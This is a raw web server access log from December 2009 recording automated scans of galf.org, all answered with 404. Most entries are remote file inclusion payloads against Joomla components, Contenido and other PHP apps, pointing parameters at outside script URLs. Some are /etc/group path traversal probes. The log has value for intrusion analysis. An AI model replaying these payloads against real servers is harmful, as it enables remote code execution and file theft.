222.231.1.32 - - [20/Dec/2009:16:55:17 -0800] "GET /logs/access_091012.log%20%20/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:21 -0800] "GET /logs/access_091012.log%20%20/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:55:29 -0800] "GET /logs/access_091012.log%20%20/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:56:27 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:56:27 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:56:28 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:56:33 -0800] "GET /logs/access_090921.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:16:56:36 -0800] "GET /home.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:16:56:36 -0800] "GET /home.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.80.193.54 - - [20/Dec/2009:16:56:40 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Media Center PC 4.0)" "www.galf.org"
170.210.192.78 - - [20/Dec/2009:16:57:17 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:16:57:42 -0800] "GET /logs/access_090921.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:57:42 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:57:42 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:57:47 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:57:47 -0800] "GET /logs/access_090921.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:57:48 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:58:35 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:58:35 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:58:35 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:58:41 -0800] "GET /logs/access_090921.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:16:58:56 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [20/Dec/2009:16:58:56 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [20/Dec/2009:16:58:56 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.231.1.32 - - [20/Dec/2009:16:59:36 -0800] "GET /logs/access_090706.log/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:16:59:45 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [20/Dec/2009:16:59:45 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.30.48.8 - - [20/Dec/2009:16:59:45 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.231.1.32 - - [20/Dec/2009:17:00:01 -0800] "GET /logs/access_090706.log/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:17:00:01 -0800] "GET /logs/access_090706.log/lostpasswd.php?env[include_prefix]=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [20/Dec/2009:17:00:01 -0800] "GET /logs/access_090921.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:00:36 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:00:36 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:00:36 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:01:20 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:01:28 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:01:28 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:01:28 -0800] "GET /logs/access_090921.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:01:30 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:01:30 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:01:49 -0800] "GET /logs/access_090921.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:01:49 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:01:49 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:01:49 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [20/Dec/2009:17:02:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:17:03:31 -0800] "GET /common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:17:03:31 -0800] "GET /logs//common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [20/Dec/2009:17:03:33 -0800] "GET /logs/access_090706.log//common/db.php?commonpath=http://macdaddy.com.au/images/header.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:04:23 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:04:23 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:04:23 -0800] "GET /logs/access_090921.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:04:34 -0800] "GET /logs/access_091109.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:17:04:41 -0800] "GET /logs/access_090824.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:05:19 -0800] "GET /logs/access_091109.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [20/Dec/2009:17:05:34 -0800] "GET /logs/access_090608.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:06:23 -0800] "GET /logs/access_091109.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:17:06:39 -0800] "GET /logs/access.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.123 - - [20/Dec/2009:17:08:47 -0800] "GET /index1.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:17:08:48 -0800] "GET /index1.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:09:58 -0800] "GET /logs/access_091109.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:11:10 -0800] "GET //skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:17:11:11 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [20/Dec/2009:17:11:13 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:11:19 -0800] "GET /logs/access.log///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:11:54 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:11:54 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:11:54 -0800] "GET /logs/access_090921.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:17:14:01 -0800] "GET /logs/access_090921.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:17:14:31 -0800] "GET /logs/access_090706.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:15:21 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:15:21 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:15:22 -0800] "GET /logs/access_090706.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:16:02 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:16:02 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:16:02 -0800] "GET /logs/access_090706.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:16:21 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:17:45 -0800] "GET /logs/access_091109.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:17:51 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:17:51 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:17:51 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:18:10 -0800] "GET /logs/access_090921.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:18:50 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:18:50 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:18:51 -0800] "GET /logs/access.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:19:24 -0800] "GET /logs/access_090921.log%20%20/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:19:46 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:19:46 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:19:46 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:17:20:04 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.123 - - [20/Dec/2009:17:20:36 -0800] "GET /index2.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:17:20:36 -0800] "GET /index2.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:20:50 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:20:50 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:20:50 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [20/Dec/2009:17:20:56 -0800] "GET /logs/access_090921.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:21:11 -0800] "GET /logs/access_090921.log/lostpasswd.php?env[include_prefix]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:28:09 -0800] "GET /logs/access_091109.log%20%20///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:28:09 -0800] "GET //skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:28:09 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.122.19.24 - - [20/Dec/2009:17:28:09 -0800] "GET /logs/access.log%20%20///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
202.122.19.24 - - [20/Dec/2009:17:28:16 -0800] "GET /logs///skin/happycast_category_darkblack//ask_password.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:24 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:24 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:24 -0800] "GET /logs/access_090706.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:30 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:30 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:30 -0800] "GET /logs/access_090706.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:40 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:40 -0800] "GET /logs/access_090706.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:40 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:41 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:41 -0800] "GET /logs/access_090706.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.202.2.220 - - [20/Dec/2009:17:28:41 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [20/Dec/2009:17:30:33 -0800] "GET /logs/access_090601.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
